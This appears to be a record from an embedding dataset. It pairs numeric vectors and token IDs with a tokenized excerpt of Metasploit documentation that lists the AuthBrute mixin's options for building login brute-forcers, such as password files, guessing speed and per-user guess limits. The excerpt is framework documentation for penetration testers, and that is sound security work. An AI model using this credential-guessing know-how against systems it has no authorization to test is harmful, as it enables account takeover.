[ 0.278879851102829, -0.5979596376419067, -0.6955357193946838, 0.4649045467376709, -0.3613370656967163, -0.7421194314956665, -0.20690198242664337, 0.2756902873516083, 1.1665894985198975, 0.8740076422691345, 0.5832462310791016, 0.16668272018432617, 0.4897555112838745, 0.021966181695461273, -0.7918859124183655, 0.058810990303754807, 0.88630610704422, 0.13815642893314362, 0.0594782754778862, 0.195314422249794, -0.4969429075717926, 1.0103129148483276, -0.7562889456748962, -0.07049715518951416, -0.5181798934936523, 0.6064539551734924, -0.35815754532814026, -0.30376750230789185, 1.4994093179702759, 0.8266761898994446, -0.38663166761398315, 0.188093900680542, 0.28115251660346985, -0.979974627494812, -0.2356499582529068, -0.28889182209968567, 0.7868414521217346, -0.0032336050644516945, -0.176691934466362, -1.5165175199508667, -0.027290552854537964, 0.04867611080408096, 0.0673186257481575, -1.1294728517532349, -0.9420065879821777, -0.01234497781842947, -0.47713521122932434, -0.016504615545272827, 0.11257496476173401, -0.06642025709152222, -0.273094117641449, 0.5177471041679382, 0.7754322290420532, -0.26309752464294434, 0.33120375871658325, -0.38258716464042664, -0.29122665524482727, -0.011917143128812313, -0.28143152594566345, 0.25564825534820557, 0.2753084897994995, 0.962047815322876, -0.10154131799936295, -0.4808793067932129, -0.30737584829330444, 0.5578417778015137, 0.018806718289852142, -0.4979274570941925, -0.10367880761623383, -0.1476946622133255, -0.4814709722995758, 0.6148681640625, -0.1304216980934143, -0.5459151268005371, -0.5316044688224792, 0.5903765559196472, 0.4162960648536682, 0.47341111302375793, -0.23640114068984985, 0.9272626042366028, -0.09749086946249008, 0.6178094744682312, 0.47966235876083374, 0.12891274690628052, -0.2812737226486206, -0.6308556199073792, -0.1353599578142166, -0.362973690032959, -0.060587599873542786, 0.5434474349021912, 0.9372899532318115, 0.8411149382591248, -0.11711883544921875, -0.45538029074668884, -0.0530494749546051, 0.7258527278900146, 0.04674746096134186, 0.2466951161623001, -0.26347845792770386, 0.3948858380317688, 0.6917230486869812, 0.5952230095863342, -0.38499653339385986, 0.4652925133705139, -0.2539251446723938, 0.8416383266448975, 0.3582894206047058, -0.30778828263282776, -0.16244001686573029, -0.6207959055900574, -0.5144133567810059, -0.2497207075357437, -0.5334903597831726, -0.4531208276748657, 0.5228959918022156, 0.2787152826786041, -0.4548667073249817, -0.4479913115501404, 0.0403897687792778, -0.4062241315841675, 0.16146957874298096, -0.21873407065868378, -0.2962348461151123, -0.4994087517261505, -0.27343618869781494, -0.24298013746738434, 0.2703211307525635, 1.1540535688400269, -0.1783689260482788, -0.14215369522571564, -1.112769603729248, -0.40747472643852234, 0.56866455078125, 1.1387914419174194, 0.5334515571594238, 0.315102756023407, -0.20671983063220978, -0.34017640352249146, 0.7966006398200989, -0.6588559746742249, -0.15662069618701935, -0.39153945446014404, 0.27307894825935364, 1.5864362716674805, -0.176430344581604, 0.941388726234436, -0.2004786878824234, 0.021052822470664978, -1.1012024879455566, 0.20718318223953247, -0.07769791781902313, -0.5452505946159363, 0.11564766615629196, -0.00040452159009873867, 0.0003085456264670938, 0.2811027467250824, -0.7988557815551758, 0.6510844826698303, 0.5274871587753296, 0.7292971014976501, 0.05585945025086403, 0.7169206142425537, -0.8168771266937256, 0.8844718933105469, -0.8831366896629333, 0.6829546689987183, -0.23730435967445374, -1.5304661989212036, 0.12237203121185303, -0.32593294978141785, 0.5420053005218506, 0.16705599427223206, -0.14342162013053894, -0.08413407951593399, 0.7847740650177002, 0.04576261714100838, 0.18558378517627716, 0.23221522569656372, 0.6611708402633667, 0.5297216773033142, -0.026722373440861702, 0.20504699647426605, 0.26228436827659607, 0.6183171272277832, 0.1749662309885025, -0.10996083170175552, -0.12980769574642181, -0.257753849029541, -0.5290118455886841, -0.5278475284576416, -0.20694059133529663, 1.1539374589920044, -0.5701785683631897, -0.39142847061157227, -0.035435713827610016, 0.0739523321390152, -0.6889313459396362, 0.32527026534080505, 0.02097981981933117, -1.0754412412643433, -1.0131266117095947, 0.5211821794509888, -0.26617518067359924, 0.17809399962425232, -0.03783982992172241, -0.6189921498298645, 0.3717978894710541, 0.4336965084075928, -0.7412121295928955, -0.3409408628940582, 1.1730036735534668, -0.42655473947525024, -0.6268163919448853, -0.27435892820358276, 0.6313794255256653, -0.05307875573635101, -0.8593593239784241, 1.0703107118606567, 0.07498365640640259, 0.18412649631500244, 0.048822786659002304, 0.828184187412262, 0.5483874678611755, 0.11320260167121887, -0.8666974902153015, -0.10603761672973633, 0.1630888432264328, 0.24551109969615936, -0.9819427132606506, 0.04002172872424126, -0.62900710105896, -0.0566738061606884, -0.5325237512588501, 0.6908628940582275, 0.7628258466720581, 0.5931742191314697, 1.1424410343170166, 0.5239018201828003, 0.5501363277435303, 0.07727029919624329, 0.3536742031574249, 0.5792991518974304, -0.5986474752426147, 0.6877946257591248, -0.05073270574212074, 0.8153787851333618, 0.08937286585569382, 0.05402855575084686, -0.12110402435064316, -0.0223811324685812, -1.1605042219161987, 0.6129387021064758, 0.2693764269351959, 0.10876467078924179, -0.9423723816871643, -0.2543010413646698, 0.10958532989025116, 0.9227704405784607, -1.3038681745529175, 0.4380509853363037, 0.20240680873394012, 0.09932248294353485, -0.37230759859085083, 0.04747072607278824, 0.6927537322044373, 0.1462433785200119, 0.44058582186698914, -0.3857171833515167, -0.002019670559093356, -0.41105422377586365, -0.5503761768341064, -0.24986624717712402, -0.9265305399894714, -0.31025299429893494, -0.9265185594558716, 0.7991986274719238, -0.2490607500076294, -0.3125898241996765, -0.39899110794067383, -0.16516534984111786, 0.3333236277103424, 0.11431921273469925, 0.6629831790924072, 0.7966499924659729, 0.43321049213409424, -0.23224981129169464, -0.09144130349159241, -0.047319214791059494, -0.5970878601074219, 0.5246888995170593, -0.6425783634185791, 0.3564457595348358, -0.3231625556945801, 0.22161979973316193, 0.015609684400260448, 0.40439727902412415, 0.057188887149095535, 0.159138485789299, 0.2652624547481537, -0.0038403961807489395, -0.8920832276344299, -0.2528761923313141, 0.21415510773658752, -0.19557081162929535, -0.9096530079841614, -0.027720438316464424, 0.5952097773551941, -0.1499134600162506, 1.3593214750289917, 0.41143685579299927, -0.16810959577560425, 1.6373125314712524, 0.10545874387025833, 0.18708951771259308, -0.9936419129371643, 1.6361205577850342, 0.3607005774974823, -0.13947637379169464, -0.3019006550312042, -0.2343275547027588, -0.3078540861606598, -0.34109506011009216, 0.0411057285964489, -0.929848849773407, -0.6008304953575134, 0.5729398727416992, 0.31189852952957153, -1.0198793411254883, 0.6395810842514038, -0.1767926663160324, -0.048698849976062775, -0.19213923811912537, 0.13631679117679596, 0.26283708214759827, -0.014066951349377632, 0.9357582926750183, -1.147702932357788, -0.43345630168914795, -0.3810991942882538, -0.20353621244430542, -0.16276901960372925, -0.7690516710281372, 0.38047873973846436, 0.20085199177265167, -0.7482517957687378, -0.13690465688705444, 0.40396904945373535, -0.45195990800857544, 0.044977299869060516, -0.7525225877761841, -0.7741634845733643, 0.4400073289871216, 0.13576790690422058, 0.3871532678604126, -0.40484973788261414, 1.2552714347839355, -1.1183910369873047, 0.31215953826904297, 0.13346394896507263, 0.2220224142074585, 0.3772210478782654, 0.5772278904914856, 0.30584409832954407, -0.2765025794506073, -0.3372121751308441, -1.0294804573059082, -0.3119070827960968, 0.36199215054512024, 0.614548921585083, -1.355455756187439, 0.8798025250434875, 0.36790382862091064, -0.2305271178483963, 0.5537617802619934, -0.054043516516685486, -0.21565762162208557, 0.14053359627723694, -0.45983070135116577, 0.39711815118789673, -0.23793557286262512, -0.4200972318649292, -0.19365286827087402, 0.2413065880537033, 0.7410332560539246, -0.4222530722618103, 0.47244033217430115, -0.44643932580947876, -0.47346779704093933, -0.5843581557273865, -0.7625465989112854, -0.44940125942230225, -0.5280077457427979, 0.6555600762367249, -0.2689224183559418, -1.2140957117080688, -0.5797490477561951, 0.6653666496276855, 1.1704542636871338, 0.4258839786052704, -0.12771162390708923, 0.410003662109375, -0.20977503061294556, 0.5454246401786804, 0.7654707431793213, 0.6528134346008301, 0.40781378746032715, -0.08110465854406357, 0.44791531562805176, 1.2185838222503662, 0.4023808240890503, 0.15891428291797638, 0.2832193374633789, -0.20279738306999207, 0.6096901893615723, -0.5301101207733154, -0.47245559096336365, -0.34906694293022156, 0.4816357493400574, 0.6560066938400269, -0.5758861303329468, -0.28720101714134216, -0.5998048782348633, -0.7237472534179688, 0.36990973353385925, 0.9607123732566833, -0.6121121048927307, -0.14324058592319489, 0.15362633764743805, -0.2048310786485672, 0.26438212394714355, 0.11718390882015228, -0.48531338572502136, -0.6699128150939941, -0.8793470859527588, -1.7681009769439697, 1.2909131050109863, 0.9494760632514954, -0.01380571722984314, 0.4148652255535126, -1.162238359451294, 0.7269641160964966, -0.23157410323619843, -0.4039749503135681, 0.43711456656455994, -0.36899158358573914, -0.2881488502025604, 0.3719126880168915, 0.14837443828582764, -0.19867689907550812, -0.03951820358633995, 0.019398901611566544, -0.30038881301879883, 0.1377914845943451, -0.6114569306373596, -0.23251454532146454, -0.07756529003381729, 0.32448244094848633, 0.8150328993797302, 0.46478110551834106, -0.12263668328523636, 0.1665135771036148, 0.3573310971260071, 0.15336494147777557, -1.1059232950210571, -0.4680410623550415, 0.7525898814201355, -0.11153152585029602, -0.03872717544436455, 0.9546364545822144, 0.07255974411964417, -0.24170976877212524, 0.23988552391529083, -0.30561909079551697, -0.6147161722183228, 0.13608545064926147, -0.406916081905365, 0.10913857072591782, 0.40127724409103394, 0.2835247814655304, 0.260842502117157, -0.906475305557251, 1.5305519104003906, 0.46761298179626465, -0.09903834015130997, -0.4189070165157318, -0.17012806236743927, -0.20800873637199402, 0.34797483682632446, 0.09447283297777176, 0.7034622430801392, -0.2871094048023224, -0.333832710981369, 0.45937222242355347, -0.5692369937896729, -0.17072001099586487, -0.027967963367700577, 0.6708925366401672, -1.0654340982437134, 0.7180715799331665, 0.24187076091766357, 0.33619406819343567, -0.03352707251906395, -0.7791757583618164, -0.6703767776489258, -0.15229056775569916, -0.37322771549224854, -0.5094736814498901, 0.38340190052986145, -0.30461665987968445, 0.22988706827163696, -0.7824012041091919, -0.017461765557527542, -0.31902727484703064, -0.11992428451776505, 0.3310917317867279, 0.8609575033187866, 1.1762492656707764, -0.9290866851806641, -0.17625318467617035, 0.293084055185318, 0.16780738532543182, -0.9939047694206238, -0.3605925440788269, 0.6327782273292542, 0.0003516580327413976, 0.5692338347434998, 0.673362672328949, -0.8637978434562683, -0.9480726718902588, -0.08540136367082596, -0.03028203919529915, -0.34947672486305237, -0.12248401343822479, -0.27284368872642517, -0.27712830901145935, -0.64570552110672, 0.35815608501434326, 0.571243166923523, -0.945263147354126, 0.365705668926239, -0.5194172859191895, 0.2462649792432785, -0.07621999084949493, -0.2739024758338928, 0.4287625253200531, -0.8162972331047058, 0.14086075127124786, 1.0187546014785767, -0.801982581615448, 0.3769175708293915, -0.546786904335022, -0.12346215546131134, 0.02424117922782898, 0.7731570601463318, -0.7596619129180908, -0.6564046144485474, 0.2711404263973236, -0.25485485792160034, -0.36857131123542786, 0.939027726650238, -0.8821628093719482, 0.2283594161272049, -0.09596177190542221, 0.6486544013023376, -0.21776269376277924, 0.4771789610385895, -1.070558786392212, 0.5309525728225708, 0.32226404547691345, -0.09805928170681, -0.10984940081834793, 0.11169446259737015, 0.9858167171478271, -0.2524183988571167, 0.15986745059490204, -0.15747420489788055, -0.445829838514328, -0.7078769207000732, -1.0107636451721191, 0.7208269238471985, -0.3220028877258301, -0.1491762101650238, 0.15412305295467377, -0.09180878102779388, 0.37224775552749634, -0.5095437169075012, 0.5747215747833252, 0.992342472076416, -0.15986581146717072, -0.02300216257572174, -1.2570316791534424, 0.739327609539032, 0.6286076903343201, -0.23464253544807434, -0.453068345785141, 0.3254081904888153, 0.301379919052124, -0.753953218460083, -0.3763450086116791, -0.01260424219071865, -0.933197021484375, 0.13725540041923523, 0.8950947523117065, -0.9455501437187195, 0.22179009020328522, 0.09688369184732437, -1.2344005107879639, -0.4616575837135315, 0.21058525145053864, 0.4878930151462555, 0.6277691125869751, 0.501246452331543, -0.11163072288036346, 0.8149002194404602, 0.5180314183235168, -0.09565389901399612, 0.18532583117485046, -1.0880688428878784, 1.6882027387619019, -0.29001131653785706, -0.9473156929016113, 0.07149435579776764, 0.7345539331436157, -0.33543962240219116, -0.7749958634376526, -0.9105324745178223, 0.32775214314460754, 0.05274350568652153, -0.633996844291687, -0.2917957603931427, -0.2554701268672943, -0.7852004170417786, 0.6372191309928894, -0.2198486477136612, 0.17154206335544586, 0.32460105419158936, 0.09862551838159561, 0.53369140625, 0.4520491063594818, 0.18906626105308533, 0.2927066385746002, 0.6973375678062439, -0.4788486659526825, -0.7467905879020691, -0.044602468609809875, -0.517946183681488, 0.6589607000350952, 0.9146665334701538, 0.3741789162158966, 0.373595654964447, 0.3203032612800598, 0.47104334831237793, 1.5084235668182373, -0.14744429290294647, 0.6274334192276001, 0.7843099236488342, -1.0174602270126343, -0.923180341720581, 0.13350771367549896, -0.1331131011247635, -0.17876754701137543, 0.5459959506988525, -0.09392192959785461, 0.22272877395153046, 0.17147566378116608, -0.28849631547927856, -0.39434951543807983, -1.0139286518096924, -0.0938280001282692, -1.1001043319702148, -0.2893255949020386, -0.10598152875900269, -0.1969357430934906, -0.12489006668329239, -0.6496046781539917, -0.9703817367553711, -0.6178051233291626, -0.7929577231407166, 0.35239177942276, 0.20437978208065033, -0.38179004192352295, -0.6782476305961609, 0.5823973417282104, -0.7490167617797852, -0.4078805148601532, -0.8181363940238953, -0.161213219165802, 0.6310564875602722, -0.7981287837028503, -0.09994655847549438, -0.17903876304626465, -0.007238086778670549, 0.552757978439331, 0.05184388533234596, 0.6726529598236084, -0.8520380258560181, -0.22649094462394714, -0.16091462969779968, 0.03448620066046715, -0.23661430180072784, 0.3431445062160492, 0.33852648735046387, -0.6083453893661499, 0.5509241223335266, 0.2269677370786667, -0.19824327528476715, 0.12000725418329239, 0.8879207372665405, 0.17110776901245117, 0.3157254457473755, -0.8160167336463928, -0.5232356786727905, -0.0546758770942688, -0.12330147624015808, 0.1595373898744583, -0.982158362865448, 0.29647085070610046, 0.7613973021507263, 0.2876841127872467, -0.30177316069602966, 0.7259334325790405, -0.3866990804672241, 0.07403908669948578, 0.6368526220321655, 0.3889312744140625, 0.20840494334697723, 0.1198764443397522, -0.06588311493396759, -0.5338268876075745, 0.6845871806144714, -0.5222749710083008, 0.6257294416427612, 0.2492363601922989, -0.09233903884887695, 0.31482502818107605, -0.04780368506908417, 0.01591954194009304, -0.5263916850090027, 0.1387311965227127, -1.0897325277328491, 0.09126336127519608, -0.2175426036119461, 0.5905857086181641, 0.2125834971666336, 0.3370642066001892, -0.07814483344554901, -0.17268139123916626, -1.3297165632247925, -0.262922465801239, 0.2445528358221054, -0.5452274680137634, -0.3621803820133209, 0.15580108761787415, -0.02863200195133686, -0.521838366985321, -0.052407484501600266, -0.5381165742874146, -0.09067665785551071, 0.4791528284549713, 0.7269810438156128, 0.5579146146774292, -1.1437022686004639, -0.6389806866645813, -0.2069922238588333, 0.5502014756202698, -0.5071142911911011, -0.9299085736274719, -0.22122395038604736, 0.4957661032676697, 0.36667466163635254, 0.11472988873720169, -0.676703929901123, -0.14568749070167542, 0.39825496077537537, 0.8885607123374939, -0.4467185437679291, 0.5340147614479065, -0.8153902292251587, 0.7234675884246826, -0.2524763345718384, 0.31642428040504456, -0.476703941822052, -0.18714824318885803, -0.15906232595443726, -0.004874577280133963, -0.1213855892419815, -0.1508619636297226, 0.13782934844493866, 0.22231628000736237, 0.7130042314529419, 0.5689367651939392, 0.0019586822018027306, -0.04924962297081947, -0.5276873707771301, -0.15823371708393097, 1.1427397727966309, 0.43629586696624756, 0.847009003162384, -0.5272243022918701, 0.8115807175636292, 0.5604550242424011, -0.8368469476699829, -0.4662623703479767, 0.22700248658657074, -1.1295490264892578, -0.16768893599510193, 0.035331886261701584, -0.6132049560546875, 0.4027652442455292, 0.3484113812446594, -0.1651781052350998, -0.480910986661911, -1.1193757057189941, 0.039433278143405914, -0.7892168760299683, -0.231470987200737, 1.2714048624038696, -1.2984097003936768, 0.0017876004567369819, 0.29294899106025696, -0.678949773311615, 0.9217673540115356, 0.9350153207778931, -0.2666945457458496, 0.3075198233127594, 0.7810492515563965, 0.39692458510398865, -0.8674461841583252, 0.08041129261255264, -0.04396570846438408, 0.5070906281471252, -0.4034111797809601, -0.06275200843811035, -0.4943285882472992, -0.23915879428386688, -0.3149948716163635, -0.14146758615970612, -0.5874291062355042, -0.14449600875377655, 0.24118804931640625, -0.4366759657859802, 0.11462415754795074, -0.4831431210041046, -0.1621396392583847, -0.9295589327812195, -0.21112093329429626, 0.10364578664302826, -0.2565990090370178, 0.8006352186203003, -0.03873360902070999, 0.36678797006607056, -0.014875223860144615, 0.13421069085597992, 0.44442492723464966, -0.3265659809112549, 1.0953794717788696, -0.40319374203681946, 0.24667362868785858, 0.7789826393127441, -0.2826526165008545, -0.14136961102485657, 0.3706642687320709, -0.31721749901771545, -0.1296737790107727, -0.1263747215270996, -0.8196851015090942, 0.10477448254823685, -0.518592119216919, -0.8815041184425354, -0.2974031865596771, 0.4930301606655121, 0.2017459273338318, -0.1505383402109146, 0.6330459117889404, 0.167079359292984, -0.5235849022865295, -0.298419326543808, 1.1650534868240356, -0.16921132802963257, -0.16050419211387634, -0.2004442662000656, -0.010284989140927792, 0.20593705773353577, -0.47539710998535156, -0.6627644300460815, -0.521515965461731, -0.2895947992801666, 0.026580290868878365, 0.07067733258008957, -0.9427276253700256, 0.021769115701317787, -0.029031839221715927, -0.018696023151278496, -0.11258292198181152, 0.3918779790401459, 0.5848800539970398, 1.0389553308486938, 0.17783766984939575, -0.05006180703639984, 0.6977538466453552, -0.14233355224132538, 1.1045171022415161, 0.2553626298904419, 1.0092445611953735, 0.455318808555603, 0.18425792455673218, 0.49971047043800354, 0.11242710798978806, 0.4736364781856537, -0.6309413909912109, -0.38261330127716064, -0.20730680227279663, 0.22094105184078217, -1.5300233364105225, -1.0432546138763428, 0.2344411015510559, 0.5989450216293335, 0.1240244209766388, -0.5022117495536804, -0.2889436185359955, -1.1204755306243896, -0.9983812570571899, -0.5977169871330261, -0.855508029460907, 0.24141058325767517, -0.09386977553367615, -0.9087432622909546, 0.35906997323036194, -1.1663010120391846, 3.776254177093506, 0.8086836934089661, 0.3530663251876831, 0.10807166248559952, -0.01269370038062334, 0.3913029730319977, 0.6282369494438171, -0.5806950926780701, -0.099395252764225, -0.8053609132766724, 1.066312313079834, 0.18142636120319366, 0.3253284692764282, 1.097377896308899, 0.9398009777069092, 0.5650607943534851, -0.15639501810073853, -0.218561053276062, 0.2784387767314911, -0.7518665790557861, -0.9817618131637573, 0.5027132630348206, -0.29648101329803467, 0.6420571804046631, 0.9168712496757507, 0.6100319623947144, 0.3025248944759369, -0.8576290011405945, 0.2326156347990036, -0.45755940675735474, 0.9577302932739258, 0.0850200429558754, 0.6626865863800049, -0.27093014121055603, -1.1558250188827515, 0.22334785759449005, -0.2881838083267212, -0.754167914390564, 0.41423583030700684, 0.5692780017852783, 0.403166264295578, 0.36096933484077454, -0.3755831718444824, -0.09782037138938904, 0.3390539586544037, 0.5134895443916321, -0.07825728505849838, -0.436798632144928, 0.36943700909614563, -0.16906829178333282, -0.4295933246612549, -0.39859023690223694, 0.18327073752880096, -0.8578903675079346, -0.500687837600708, -0.49838224053382874, 0.5320647358894348, -0.16153205931186676, -0.004334963858127594, 0.2525370419025421, -0.14045032858848572, 0.6611033082008362, -0.05971425399184227, -0.43206238746643066, 0.005234438925981522, -0.2718357443809509, 0.19051308929920197, 0.6721730828285217, -0.06881408393383026, -0.3872663974761963, 0.139290913939476, -0.30973538756370544, -0.4313369393348694, -0.3731798529624939, 0.2848789393901825, 0.4376913607120514, -0.17756572365760803, -0.10441212356090546, 0.09210073202848434, -1.047238826751709, 0.03343965485692024, -0.26043766736984253, -0.42312368750572205, -0.3097667396068573, 0.10804396867752075, 1.1639305353164673, -0.5387070775032043, 0.4503019154071808, -0.41164639592170715, 0.8501863479614258, 0.9984173774719238, 1.254154920578003, -0.6168630123138428, 0.8754432201385498, 0.324479341506958 ]
[ 101, 3193, 1996, 6745, 17928, 9986, 2015, 2012, 1024, 16770, 1024, 1013, 1013, 9986, 2015, 1012, 18804, 13102, 4135, 4183, 1012, 4012, 1013, 17928, 1013, 102 ]
metasploit
123.txt
0
[CLS] how to use msf : : auxiliary : : authbrute to write a bruteforcerthe msf : : auxiliary : : authbrute mixin should no longer be used to write a login module, you should try our loginscanner api instead. however, some of the datastore options are still needed, so let ’ s go over them right quick. regular optionsusername - ( string ) a specific username to authenticate as. password - ( string ) a specific password to authenticate with. user _ file - ( string ) file containing usernames, one per line. pass _ file - ( string ) file containing passwords, one per line. userpass _ file - ( string ) file containing users and passwords separated by space, one pair per line. bruteforce _ speed - ( integer ) how fast to bruteforce, from 0 to 5. verbose - ( boolean ) whether to print output for all attempts. blank _ passwords - ( boolean ) try blank passwords for all users. user _ as _ pass - ( boolean ) try the username as the password for all users. db _ all _ creds - ( boolean ) try each user / password couple stored in the current database. db _ all _ users - ( boolean ) add all users in the current database to the list. stop _ on _ success - ( boolean ) stop guessing when a credential works for a host. advanced optionsremove _ user _ file - ( boolean ) automatically delete the user _ file on module completion. remove _ pass _ file - ( boolean ) automatically delete the pass _ file on module completion. remove _ userpass _ file - ( boolean ) automatically delete the userpass _ file on module completion. maxguessesperservice - ( integer ) maximum number of credentials to try per service instance. if set to zero or a non - number, this option will not be used. maxminutesperservice - ( integer ) maximum time in minutes to bruteforce the service instance. if set to zero or a non - number, this option will not be used. maxguessesperuser - ( integer ) maximum guesses for a particular username for the service instance. note that users are considered unique among different services, so a user at 10. 1. 1. 1 : 22 is different from one at 10. 2. 2. 2 : 22, and
[ 0.07678535580635071, -0.05113449692726135, 0.18156492710113525, -0.20189842581748962, -0.4239346385002136, 0.138925701379776, -0.21536710858345032, 0.016851255670189857, 0.004350554663687944, 0.612052857875824, -0.005561291240155697, 0.4631175994873047, -0.11823152005672455, -0.6230180859565735, -0.7401130199432373, -0.3240355849266052, -0.5360216498374939, -0.11121760308742523, -0.5991278290748596, 0.02528320997953415, -0.2536156475543976, 0.20721107721328735, -0.7317229509353638, -0.8988950252532959, -0.5404863357543945, 0.24107582867145538, 0.7262195944786072, -0.027498934417963028, 0.5468884706497192, 0.9351600408554077, 0.7492902874946594, 0.128508523106575, 0.16532061994075775, -0.18834765255451202, 0.19604836404323578, 0.13006214797496796, 0.8603733777999878, -0.8603496551513672, -0.5020539164543152, -0.7778608798980713, 0.3496594727039337, -0.32489627599716187, -0.24694012105464935, -0.3165215253829956, -0.6934871077537537, -0.5185506343841553, -0.43860238790512085, 0.1604130119085312, 0.20418469607830048, -0.4883507192134857, 0.3321254551410675, 0.026293663308024406, 0.2740040421485901, 0.05052931234240532, -0.2770676016807556, -0.30660557746887207, -0.5603584051132202, 0.28613942861557007, -0.3672597110271454, 0.21014462411403656, 0.08255848288536072, 0.5787537693977356, 0.3583160638809204, -0.45569169521331787, 0.03862878307700157, -0.12876316905021667, 0.728477954864502, -0.19370627403259277, -0.13724392652511597, -1.0234425067901611, 0.4634529650211334, 0.6754055619239807, -0.24750997126102448, -0.30545759201049805, -0.6185641288757324, 0.2787984609603882, 0.02386234886944294, -0.2679264545440674, -0.815509021282196, 0.8738752603530884, -0.3492235839366913, 0.46792516112327576, 0.3202103078365326, -0.35917535424232483, 0.02691658027470112, -0.08507045358419418, 0.4245980679988861, 0.6780210733413696, -0.5849569439888, -0.5572006106376648, 0.12146375328302383, 0.5422173142433167, -0.37808266282081604, -0.5245271325111389, 0.4565429091453552, 0.908789336681366, -0.7104253768920898, -0.010776703245937824, 0.09424802660942078, -0.46541059017181396, 0.703213632106781, 0.5093063712120056, 0.40013816952705383, 0.5489827990531921, -0.028661999851465225, 0.8271156549453735, 0.09567127376794815, 0.17453984916210175, -0.6091365814208984, -0.410095751285553, 0.24221032857894897, -0.04529331624507904, 0.7070757746696472, -0.6788678169250488, 0.015453615225851536, 0.8710798621177673, 0.1731375902891159, 0.14209511876106262, -0.6493852138519287, 0.7729232311248779, 0.17321529984474182, -0.3474207818508148, -0.06903795152902603, -0.48553797602653503, 0.2407388836145401, -0.2646476626396179, 0.19782701134681702, 0.3520507514476776, -0.44233468174934387, -1.027191400527954, -0.3535960614681244, 0.3222692310810089, 0.32716694474220276, 0.5795122385025024, 0.15195108950138092, 0.6060320734977722, -0.051559414714574814, 1.0433012247085571, 0.4131312072277069, -1.1682050228118896, 0.36529624462127686, 0.8397104740142822, 0.417711466550827, 1.376698613166809, 0.17920002341270447, 0.12034108489751816, -0.09567731618881226, -0.007073365151882172, -0.6745671629905701, 0.5757812857627869, -0.19483987987041473, 0.13524211943149567, 0.2425956428050995, 0.07188235968351364, -0.480747252702713, -0.17684835195541382, -0.17723535001277924, 0.41819584369659424, -0.3631895184516907, -0.13258615136146545, -0.3374827206134796, 1.74216628074646, 0.16278937458992004, 0.7879139184951782, -0.1433175951242447, 0.47194281220436096, -0.7950133085250854, -0.7071360349655151, 0.06030021607875824, -0.23790185153484344, 0.2567276656627655, -0.12263376265764236, 0.5942738652229309, -0.4466770887374878, 1.440684199333191, 1.1673439741134644, 0.3018258512020111, -0.8764837384223938, 0.4631286561489105, 0.6663458943367004, -1.0044355392456055, 1.1047157049179077, -0.08399861305952072, 1.2569025754928589, -0.33158814907073975, -0.3538767993450165, -0.4195230007171631, -0.19743648171424866, -0.07832551747560501, -0.6051030158996582, 0.1759534627199173, 0.3393927216529846, -0.3157205581665039, 0.40062689781188965, 0.7778089046478271, -0.11874359101057053, -0.4571862518787384, -0.020499395206570625, 0.0069700367748737335, -1.2155530452728271, -0.3692326545715332, 0.6863995790481567, 0.5197246074676514, 0.8747696280479431, -0.5137603878974915, -0.07890994101762772, 0.5768643021583557, 0.8335115909576416, 0.3246156573295593, 0.7751304507255554, 0.7361704111099243, 0.08529455214738846, -0.05141237750649452, -0.1439448744058609, -0.13783811032772064, -0.23905222117900848, -0.6205554604530334, 0.7689877152442932, 0.3117547631263733, 0.060303159058094025, -0.3355005979537964, 0.5946915745735168, 0.3107736110687256, 0.00820224080234766, 0.10630226135253906, -0.5055559277534485, 0.24338306486606598, 0.5361413359642029, -0.5640209913253784, 0.06480815261602402, -0.11004967242479324, 0.8848953247070312, 0.39992669224739075, 0.9809547662734985, 0.24784137308597565, -0.14400197565555573, -0.34004032611846924, 0.021312689408659935, -0.1862250566482544, -0.13211363554000854, -0.4901830554008484, 0.5785056948661804, 0.7262058854103088, 0.9733502864837646, 0.009387277066707611, 0.6487088203430176, 0.36012980341911316, -0.19365543127059937, 0.7412207126617432, 0.4450637996196747, -0.012374968267977238, 1.4427766799926758, 0.42581069469451904, -0.16380591690540314, -1.0634173154830933, -0.47116002440452576, 0.7063339948654175, 0.9201879501342773, -0.6624558568000793, -0.4219058156013489, -0.06994848698377609, 0.19092676043510437, 0.03627142310142517, -0.07701848447322845, 0.21595048904418945, -0.017571162432432175, 0.15368632972240448, 0.3967340588569641, -0.07927101105451584, -0.33701345324516296, -0.7353309988975525, -0.6387746930122375, -1.1000005006790161, -0.541471004486084, -0.5996958613395691, -0.04283817857503891, 0.09824943542480469, -0.22714991867542267, 0.3941764533519745, -0.996502697467804, -0.3322395384311676, -0.1678248941898346, 0.28245195746421814, 0.7111483216285706, 0.3256063461303711, -0.055499427020549774, -0.4733753204345703, 0.10539334267377853, -0.30651137232780457, 0.42740219831466675, -0.08660385012626648, 0.25310441851615906, -0.045055314898490906, -0.042548466473817825, -0.10496902465820312, -0.27368345856666565, 0.9773110151290894, 0.10210150480270386, -0.20573221147060394, -0.13806995749473572, -0.3659992218017578, 0.7194846272468567, 0.3650657832622528, 0.5854345560073853, -0.5331196784973145, 0.3486804962158203, 0.09397464245557785, -0.04331077262759209, 0.5629693865776062, 0.7275391817092896, -0.7558832168579102, 0.43171459436416626, 0.3673958480358124, 0.7945079207420349, -0.5974462032318115, 0.6377777457237244, 0.3119103014469147, 0.3271302282810211, -0.23590512573719025, -0.6130605936050415, -0.01629171147942543, -0.2587038278579712, 0.2103332132101059, -0.1541011482477188, -0.06888634711503983, 0.2898617386817932, 0.20266205072402954, -1.118356466293335, 0.39117518067359924, -0.9510310888290405, -0.4198940098285675, -0.2980472445487976, -0.2832033038139343, 0.5929787158966064, 0.3461574614048004, -0.2545117735862732, -0.5718084573745728, -0.485792875289917, -0.2956332564353943, 0.06519303470849991, -0.13489846885204315, -0.6874605417251587, 1.1352020502090454, 0.02306615374982357, -0.4673369824886322, 0.7537109851837158, 0.44772040843963623, -0.3407773971557617, -0.42934322357177734, 0.24389804899692535, 0.688298225402832, 0.20379073917865753, 0.49207866191864014, 0.2746753394603729, 0.5005976557731628, 0.42875105142593384, 0.05757896602153778, 0.5176447033882141, -0.07890237122774124, 0.17880617082118988, 0.6910268664360046, 0.22352172434329987, 0.022815926000475883, 0.022332146763801575, -0.5601385235786438, -0.03348974511027336, -0.25668859481811523, 0.7158725261688232, 0.49233168363571167, -0.28806906938552856, 1.0969257354736328, -0.0371335931122303, -0.38124433159828186, 1.2389016151428223, -0.2867952585220337, -0.2325190305709839, 1.1733410358428955, -0.22932229936122894, 0.7434307336807251, -0.5319522023200989, 0.7878775000572205, -0.14003464579582214, 0.007969498634338379, 0.1945256143808365, -0.05870373174548149, -0.0514422208070755, -0.40141919255256653, -0.6985219120979309, -0.42963942885398865, -0.26405197381973267, -0.7190333008766174, -0.4777442216873169, -0.13696883618831635, -0.8909244537353516, -0.4064944386482239, -0.4764493405818939, 0.8791946172714233, 0.37363338470458984, 0.9749932885169983, 0.6131255030632019, 0.42605060338974, -0.09098456799983978, 